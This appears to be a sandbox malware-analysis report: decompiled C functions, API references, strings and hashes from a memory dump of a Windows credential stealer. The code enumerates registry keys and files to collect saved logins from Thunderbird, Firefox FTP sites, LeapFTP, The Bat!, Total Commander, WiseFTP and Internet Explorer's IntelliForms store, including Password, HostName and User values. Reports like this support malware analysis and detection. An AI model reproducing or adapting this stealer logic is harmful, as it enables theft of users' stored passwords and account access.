0x0040770e
0x00407714
0x0040771b
0x0040771b
0x00407742
0x00000000
0x00000000
0x00407766
0x0040776c
0x00407786
0x004077a1
0x004077ae
0x004077c3
0x004077db
0x004077db
0x004077e7
0x004077fc
0x00407814
0x00407814
0x0040781f
0x0040782a
0x0040783b
0x00407846
0x0040784b
0x0040784b
0x00000000
0x00407856
0x0040785c

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407707
RegEnumKeyExA.ADVAPI32 ref: 0040773B
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407856

Strings

sites.dat, xrefs: 004077B5, 004077EE
InstallPath, xrefs: 00407773
sites.ini, xrefs: 004077CD, 00407806
DataDir, xrefs: 0040778E

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DataDir$InstallPath$sites.dat$sites.ini
API String ID: 1332880857-3870687875
Opcode ID: a1b0c8f118b5cf310e500faf11409689718c414b859c1c221b5c31afa3c4b199
Instruction ID: 927ebaac81f16cff042132974810b193f85d558a295493d701847d58b646bf3e
Opcode Fuzzy Hash: a1b0c8f118b5cf310e500faf11409689718c414b859c1c221b5c31afa3c4b199
Instruction Fuzzy Hash: 7B31367190010CFADF216F51CC42BDDBABABF40304F10C0BAB249750A1DBB96AD19F89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8D4, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F8D4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t27;
				void* _t28;
				void* _t29;

				_t29 = __eflags;
				_t28 = __edx;
				_t27 = __ecx;
				_v8 = E0040150D(_a4, 0x5f, 0);
				 *0x415824 = 2;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed
				SetCurrentDirectoryA( &_v269);
				 *0x415824 = 3;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t27, _a4,  *0x4140fe, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
				E0040988E(_t27, _a4, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird");
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t28, _t29, _a4, _v8);
			}

0x0040f8d4
0x0040f8d4
0x0040f8d4
0x0040f8e9
0x0040f8ec
0x0040f902
0x0040f91f
0x0040f93b
0x0040f947
0x0040f94c
0x0040f962
0x0040f97f
0x0040f99b
0x0040f9a7
0x0040f9b8

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F902

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F947
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F962
SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F9A7

Strings

Software\Mozilla, xrefs: 0040F911, 0040F92E, 0040F971, 0040F98E
Thunderbird, xrefs: 0040F90C, 0040F929, 0040F96C, 0040F989
\Thunderbird, xrefs: 0040F907, 0040F924, 0040F967, 0040F984

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Software\Mozilla$Thunderbird$\Thunderbird
API String ID: 3062143572-138716004
Opcode ID: 7c3fa61173009b4ca2e9781aeb53dc7a0a85dc8ee5f4a4127f73e7b56d1f1c89
Instruction ID: c0f4bf9869d67093f7a4d6c15c65fc638ecd3aa445a68d8f1d8abc8d79fc93f9
Opcode Fuzzy Hash: 7c3fa61173009b4ca2e9781aeb53dc7a0a85dc8ee5f4a4127f73e7b56d1f1c89
Instruction Fuzzy Hash: 991142B1690208BADB017B91CD03FC93E655B44748F518077B608741E3D6F989D08B9C

Uniqueness

Uniqueness Score: -1.00%

Function 004078AB, Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004078AB(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				char* _t22;
				void* _t26;
				void* _t28;
				char* _t31;
				int _t32;
				void* _t34;
				void* _t36;
				void* _t41;
				char* _t42;
				char* _t43;

				_v8 = E0040150D(_a4, 0x1b, 0);
				_t43 =  *0x414082; // 0x0
				_t42 =  *0x414086; // 0x0
				if( *_t42 == 0) {
					L11:
					E0040785F(_t49, _a4, 0x1a); // executed
					E0040785F(_t49, _a4, 0x23); // executed
					E0040785F(_t49, _a4, 0x1c); // executed
					E004076F4(_a4,  *0x4140fe, "SOFTWARE\\LeapWare"); // executed
					E004076F4(_a4, 0x80000002, "SOFTWARE\\LeapWare"); // executed
					return E00401553(_t41, _t49, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t22 = StrStrA(_t43, "unleap.exe");
					if(_t22 == 0) {
						__eflags = StrStrIA(_t42, "leapftp");
						if(__eflags != 0) {
							_t26 = E0040234A(__eflags, _t43);
							_push(_t26);
							E00404131(_a4, _t26, "sites.dat", 0xbeef0000);
							_t28 = _t26;
							E00404131(_a4, _t28, "sites.ini", 0xbeef0001);
							E004017D5();
						}
					} else {
						_t31 = _t22 + 1;
						if( *_t31 != 0) {
							_t32 = lstrlenA("unleap.exe");
							_t41 = _t31;
							_t34 = E0040234A(_t32 + _t41, _t32 + _t41);
							_push(_t34);
							E00404131(_a4, _t34, "sites.dat", 0xbeef0000);
							_t36 = _t34;
							E00404131(_a4, _t36, "sites.ini", 0xbeef0001);
							E004017D5();
						}
					}
					while( *_t43 != 0) {
						_t43 =  &(_t43[1]);
						__eflags = _t43;
					}
					_t43 =  &(_t43[1]);
					asm("cld");
					asm("repne scasb");
					_t49 =  *_t42;
				} while ( *_t42 != 0);
				goto L11;
			}

0x004078bf
0x004078c2
0x004078c8
0x004078d1
0x0040798e
0x00407993
0x0040799d
0x004079a7
0x004079ba
0x004079cc
0x004079df
0x00000000
0x00000000
0x00000000
0x004078d7
0x004078d7
0x004078e2
0x004078e4
0x0040793b
0x0040793d
0x00407940
0x00407945
0x00407955
0x0040795a
0x00407969
0x0040796e
0x0040796e
0x004078e6
0x004078e6
0x004078ea
0x004078f2
0x004078f7
0x004078fb
0x00407900
0x00407910
0x00407915
0x00407924
0x00407929
0x00407929
0x0040792e
0x00407976
0x00407975
0x00407975
0x00407975
0x0040797b
0x0040797c
0x00407984
0x00407986
0x00407986
0x00000000

APIs

StrStrA.SHLWAPI(00000000,unleap.exe), ref: 004078DD
lstrlenA.KERNEL32(unleap.exe,00000001,00000000,unleap.exe), ref: 004078F2

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

StrStrIA.SHLWAPI(00000000,leapftp,00000000,unleap.exe), ref: 00407936

Strings

sites.dat, xrefs: 00407907, 0040794C
sites.ini, xrefs: 0040791B, 00407960
unleap.exe, xrefs: 004078D7, 004078ED
SOFTWARE\LeapWare, xrefs: 004079AC, 004079BF
leapftp, xrefs: 00407930

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
API String ID: 1884169789-1497043051
Opcode ID: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
Instruction ID: 9698fba736c6e1230d64bcfce157fb16b9fb49397a8a83bf77b3dc4cab1f149d
Opcode Fuzzy Hash: a23ac7e933ef7ad5b65a643290468662966a71c383aa1d0acf6512d9c10ad142
Instruction Fuzzy Hash: 3821D5B1644504B9EB113B21CC06FEE3E1A9B90314F20803BBA05B95F3D7BC5EC1969E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFFB, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EFFB(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v16;
				intOrPtr _v20;
				char _v60;
				char _v64;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr _t47;
				intOrPtr _t53;
				void* _t62;

				_t36 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "Working Directory", 0); // executed
				_t37 = _t36;
				if(_t37 != 0) {
					_v8 = _t37;
					E0040EF86(_a4, _v8);
					E004017D5(_v8);
				}
				_t38 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "ProgramDir", 0); // executed
				_t39 = _t38;
				if(_t39 != 0) {
					_v8 = _t39;
					E0040EF86(_a4, _v8);
					E004017D5(_v8);
				}
				_t40 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Default", 0); // executed
				_t41 = _t40;
				if(_t41 != 0) {
					_v8 = _t41;
					E0040EF86(_a4, _v8);
					E004017D5(_v8);
				}
				_t43 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Count",  &_v16); // executed
				_t44 = _t43;
				if(_t44 != 0) {
					_v12 = _t44;
					if(_v16 != 4) {
						L17:
						return E004017D5(_v12);
					}
					_t47 =  *_v12;
					if(_t47 > 0x2710) {
						_t47 = 0x2710;
					}
					_v20 = _t47;
					while(_v20 != 0) {
						wsprintfA( &_v60, "Dir #%d", _v20);
						_t62 = _t62 + 0xc;
						_t53 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot",  &_v60,  &_v64);
						if(_t53 != 0) {
							_v8 = _t53;
							if(_v64 > 3) {
								E0040EF86(_a4, _v8);
							}
							E004017D5(_v8);
						}
						_v20 = _v20 - 1;
					}
					goto L17;
				}
				return _t44;
			}

0x0040f010
0x0040f015
0x0040f017
0x0040f019
0x0040f022
0x0040f02a
0x0040f02a
0x0040f03e
0x0040f043
0x0040f045
0x0040f047
0x0040f050
0x0040f058
0x0040f058
0x0040f06c
0x0040f071
0x0040f073
0x0040f075
0x0040f07e
0x0040f086
0x0040f086
0x0040f09c
0x0040f0a1
0x0040f0a3
0x0040f0a5
0x0040f0ac
0x0040f116
0x00000000
0x0040f119
0x0040f0b1
0x0040f0b8
0x0040f0ba
0x0040f0ba
0x0040f0bf
0x0040f110
0x0040f0d0
0x0040f0d5
0x0040f0ed
0x0040f0ef
0x0040f0f1
0x0040f0f8
0x0040f100
0x0040f100
0x0040f108
0x0040f108
0x0040f10d
0x0040f10d
0x00000000
0x0040f110
0x0040f11f

APIs

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

wsprintfA.USER32 ref: 0040F0D0

Strings

Dir #%d, xrefs: 0040F0C7
Default, xrefs: 0040F05F
Working Directory, xrefs: 0040F003
ProgramDir, xrefs: 0040F031
Software\RIT\The Bat!\Users depot, xrefs: 0040F064, 0040F094, 0040F0E0
Count, xrefs: 0040F08F
Software\RIT\The Bat!, xrefs: 0040F008, 0040F036

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
API String ID: 988369812-1921698578
Opcode ID: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
Instruction ID: efec917b93c5790ddd6963f177ddc18cbde9d62d709c2f7ca4761b08757c98aa
Opcode Fuzzy Hash: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
Instruction Fuzzy Hash: 5F310771E40109FADF21AFA1DC42ADD7B72AB00304F244477B814B65E1E77A9BA4AB48

Uniqueness

Uniqueness Score: -1.00%

Function 00404A31, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A31(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				CHAR* _v12;
				intOrPtr _v16;
				int _t37;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t79;

				_t79 = __edx;
				_v8 = E0040150D(_a4, 2, 0);
				"_cx_ftp.ini" = 0x77;
				M004149B3 = 0x47;
				"_hisler\\Total Commander" = 0x47;
				_v12 = E004017EC(0x105);
				_t37 = GetWindowsDirectoryA(_v12, 0x104);
				if(_t37 == 0) {
					L3:
					E004017D5(_v12);
				} else {
					_t82 = _t37 - 0x104;
					if(_t37 > 0x104) {
						goto L3;
					} else {
						E004048FE(_a4, _v12); // executed
					}
				}
				_t39 = E00401DCE(_t82, 0x28); // executed
				E004048FE(_a4, _t39); // executed
				_t41 = E00401DCE(_t82, 0x1a); // executed
				_t42 = _t41;
				_t83 = _t42;
				if(_t42 != 0) {
					E004048FE(_a4, E00401D69(_t42, "\\GHISLER")); // executed
				}
				_t43 = E00401DCE(_t83, 0x23); // executed
				_t44 = _t43;
				_t84 = _t44;
				if(_t44 != 0) {
					E004048FE(_a4, E00401D69(_t44, "\\GHISLER")); // executed
				}
				_t45 = E00401DCE(_t84, 0x1c); // executed
				_t46 = _t45;
				if(_t45 != 0) {
					E004048FE(_a4, E00401D69(_t46, "\\GHISLER")); // executed
				}
				_t47 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t47);
				_t50 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "FtpIniName", 0);
				if(_t50 != 0) {
					_v16 = _t50;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				_t51 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t51);
				_t54 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "FtpIniName", 0);
				if(_t54 != 0) {
					_v16 = _t54;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				_t55 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t55);
				_t57 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "FtpIniName", 0); // executed
				_t58 = _t57;
				if(_t58 != 0) {
					_v16 = _t58;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				_t59 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
				E004048FE(_a4, _t59);
				_t61 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "FtpIniName", 0); // executed
				_t62 = _t61;
				_t89 = _t62;
				if(_t62 != 0) {
					_v16 = _t62;
					E004048E7(_a4, _v16);
					E004017D5(_v16);
				}
				return E00401553(_t79, _t89, _a4, _v8);
			}

0x00404a31
0x00404a43
0x00404a46
0x00404a4d
0x00404a54
0x00404a65
0x00404a75
0x00404a77
0x00404a8d
0x00404a90
0x00404a79
0x00404a79
0x00404a7e
0x00000000
0x00404a80
0x00404a86
0x00404a86
0x00404a7e
0x00404a97
0x00404aa0
0x00404aa7
0x00404aac
0x00404aac
0x00404aae
0x00404abf
0x00404abf
0x00404ac6
0x00404acb
0x00404acb
0x00404acd
0x00404ade
0x00404ade
0x00404ae5
0x00404aea
0x00404aec
0x00404afd
0x00404afd
0x00404b14
0x00404b1d
0x00404b39
0x00404b3b
0x00404b3d
0x00404b46
0x00404b4e
0x00404b4e
0x00404b65
0x00404b6e
0x00404b8a
0x00404b8c
0x00404b8e
0x00404b97
0x00404b9f
0x00404b9f
0x00404bb5
0x00404bbe
0x00404bd4
0x00404bd9
0x00404bdb
0x00404bdd
0x00404be6
0x00404bee
0x00404bee
0x00404c04
0x00404c0d
0x00404c23
0x00404c28
0x00404c28
0x00404c2a
0x00404c2c
0x00404c35
0x00404c3d
0x00404c3d
0x00404c4e

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404A70

Strings

Software\_hisler\Windows Commander, xrefs: 00404B09, 00404B29, 00404BAB, 00404BCA
\GHISLER, xrefs: 00404AB0, 00404ACF, 00404AEE
Software\_hisler\Total Commander, xrefs: 00404B5A, 00404B7A, 00404BFA, 00404C19
FtpIniName, xrefs: 00404B24, 00404B75, 00404BC5, 00404C14
InstallDir, xrefs: 00404B04, 00404B55, 00404BA6, 00404BF5

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocDirectoryLocalWindows
String ID: FtpIniName$InstallDir$Software\_hisler\Total Commander$Software\_hisler\Windows Commander$\GHISLER
API String ID: 3186838798-174342358
Opcode ID: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
Instruction ID: af35828189b00225af904a715eab3383fb197f901e28e357ccde0e703416f596
Opcode Fuzzy Hash: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
Instruction Fuzzy Hash: BD5156F5AA4249BAEF013BB2CD03FAD7E659F80748F10803B7614740F1DABD8950AA5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A364, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
				char _v24;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				signed int _t50;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t85;

				_t80 = __ecx;
				_t50 = lstrlenW(_a8);
				if(_t50 != 0) {
					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
					_t81 = 0;
					_v48 = 0;
					while(_t81 < 0x14) {
						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
						_t81 = _t81 + 1;
					}
					_t84 = 0;
					_v52 = 0;
					while(_t84 < 0x14) {
						_push( *(_t84 +  &_v24) & 0x000000ff);
						wsprintfA( &_v44, "%02X");
						_t85 = _t85 + 0xc;
						_v52 = E00401D69(_v52,  &_v44);
						_t84 = _t84 + 1;
					}
					_v48 = _v48 & 0x000000ff;
					_push(_v48);
					wsprintfA( &_v44, "%02X");
					_v52 = E00401D69(_v52,  &_v44);
					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
					_t67 = _t66;
					if(_t67 != 0) {
						_v60 = _t67;
						if(_v56 != 0) {
							_v84 = (lstrlenW(_a8) << 1) + 2;
							_push(_a8);
							_pop( *_t30);
							_push(_v56);
							_pop( *_t32);
							_push(_v60);
							_pop( *_t34);
							_v72 = 0;
							if( *0x41442d != 0) {
								_push( &_v76);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v84);
								_push(0);
								_push( &_v68);
								if( *0x41442d() != 0 && _v72 != 0) {
									if(_a12 != 0) {
										 *_a12 = 0x3f;
									}
									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
									LocalFree(_v72);
								}
							}
						}
						E004017D5(_v60);
					}
					return E004017D5(_v52);
				} else {
					return _t50;
				}
			}

APIs

lstrlenW.KERNEL32(?), ref: 0040A36E
wsprintfA.USER32 ref: 0040A3EB
lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB

Strings

%02X, xrefs: 0040A3B2, 0040A3E2
Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A409

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocalwsprintf
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 63427805-2450551051
Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004046FB, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046FB(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				long _t38;
				long _t39;

				_t38 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t39 = _t38;
				if(_t39 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
						E004017D5(_t44);
						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E00401486(_a4, 0xbeef0000);
							E004014E8(_a4, _v2072);
							E004014E8(_a4, _v2076);
							E004014E8(_a4, _v2080);
						}
						E004017D5(_v2080);
						E004017D5(_v2072);
						E004017D5(_v2076);
						E004046FB(_a4, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t39;
			}

0x00404711
0x00404716
0x00404718
0x0040471e
0x00404725
0x00404725
0x0040474c
0x00000000
0x00000000
0x00404770
0x00404776
0x00404793
0x004047b1
0x004047cf
0x004047dc
0x004047f8
0x00404806
0x00404814
0x00404822
0x00404822
0x0040482d
0x00404838
0x00404843
0x00404851
0x0040485c
0x00404861
0x00404861
0x00000000
0x0040486c
0x00404872

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00404711
RegEnumKeyExA.ADVAPI32 ref: 00404745
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040486C

Strings

HostName, xrefs: 0040479B
User, xrefs: 004047B9
Password, xrefs: 0040477D

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$User
API String ID: 1332880857-1253078594
Opcode ID: 34796f9fa72e5c0a8b603da2951ed1159b3a108f4c29e927ee022d429b90114d
Instruction ID: 274f6807b80e73b8c345a4adb4ff243209de0c90348e176c4e7a203eb37303a1
Opcode Fuzzy Hash: 34796f9fa72e5c0a8b603da2951ed1159b3a108f4c29e927ee022d429b90114d
Instruction Fuzzy Hash: 0C31077194011CBADF216FA2CC42BDD7AB9BF44304F10C0BAB644751B1EBB95A929F98

Uniqueness

Uniqueness Score: -1.00%

Function 00408C47, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00408C47(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				long _t34;
				long _t35;
				intOrPtr _t46;
				intOrPtr _t50;
				void* _t57;

				_t57 = __ecx;
				_t34 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t35 = _t34;
				if(_t35 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t40);
						_v2072 = E00401C8E(_a8, _v2068, 0, 0);
						_t46 = E0040234A(__eflags, _v2072);
						__eflags = _t46;
						if(_t46 == 0) {
							L8:
							E004017D5(_v2072);
							E00408C47(_t57, _a4, _a8, _v2068);
							E004017D5(_v2068);
							_v12 = _v12 + 1;
							continue;
						}
						_push(_t46);
						_v2076 = _t46;
						_t50 = E00401E9C(_v2076);
						__eflags = _t50;
						if(_t50 != 0) {
							E00404131(_a4, _v2076, "wiseftpsrvs.ini", 0xbeef0002);
							E00404131(_a4, _v2076, "wiseftp.ini", 0xbeef0002);
							E00404131(_a4, _v2076, "wiseftpsrvs.bin", 0xbeef0000);
						}
						E004017D5();
						goto L8;
					}
					return RegCloseKey(_v8);
				}
				return _t35;
			}

0x00408c47
0x00408c5a
0x00408c5f
0x00408c61
0x00408c67
0x00408c6e
0x00408c6e
0x00408c95
0x00000000
0x00000000
0x00408cb9
0x00408cbf
0x00408cd6
0x00408ce7
0x00408ce7
0x00408ce9
0x00408d4e
0x00408d54
0x00408d65
0x00408d70
0x00408d75
0x00000000
0x00408d75
0x00408ceb
0x00408cec
0x00408cf8
0x00408cfd
0x00408cff
0x00408d14
0x00408d2c
0x00408d44
0x00408d44
0x00408d49
0x00000000
0x00408d49
0x00000000
0x00408d80
0x00408d86

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
RegEnumKeyExA.ADVAPI32 ref: 00408C8E
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80

Strings

wiseftpsrvs.bin, xrefs: 00408D36
wiseftp.ini, xrefs: 00408D1E
wiseftpsrvs.ini, xrefs: 00408D06

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
API String ID: 1332880857-3184955129
Opcode ID: 9b7b45d8c3723c3143dadf0c42a641b027867ae380e8a0435a1087aadd676337
Instruction ID: 6933cf3e983a815ab224151528d9636a50beec05a79b4a1705713022bd00aa48
Opcode Fuzzy Hash: 9b7b45d8c3723c3143dadf0c42a641b027867ae380e8a0435a1087aadd676337
Instruction Fuzzy Hash: 2B31287190010CBADF216F61CD42FDDBABABF50304F1080BAB684B51E1DE799A919F98

Uniqueness

Uniqueness Score: -1.00%

Function 00409A1D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A1D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t12;
				void* _t23;
				void* _t24;

				_t24 = __edx;
				_t23 = __ecx;
				_v8 = E0040150D(_a4, 0x25, 0);
				_t12 = E00401DCE(__eflags, 0x1a);
				_t26 = _t12;
				if(_t12 != 0) {
					E00404131(_a4, E00401D69(_t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
					E004017D5(_t20);
				}
				 *0x415824 = 1;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t23, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E0040988E(_t23, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t24, _t26, _a4, _v8);
			}

0x00409a1d
0x00409a1d
0x00409a32
0x00409a3c
0x00409a3c
0x00409a3e
0x00409a5a
0x00409a5f
0x00409a5f
0x00409a64
0x00409a7a
0x00409a97
0x00409ab3
0x00409abf
0x00409ad0

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A7A
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409ABF

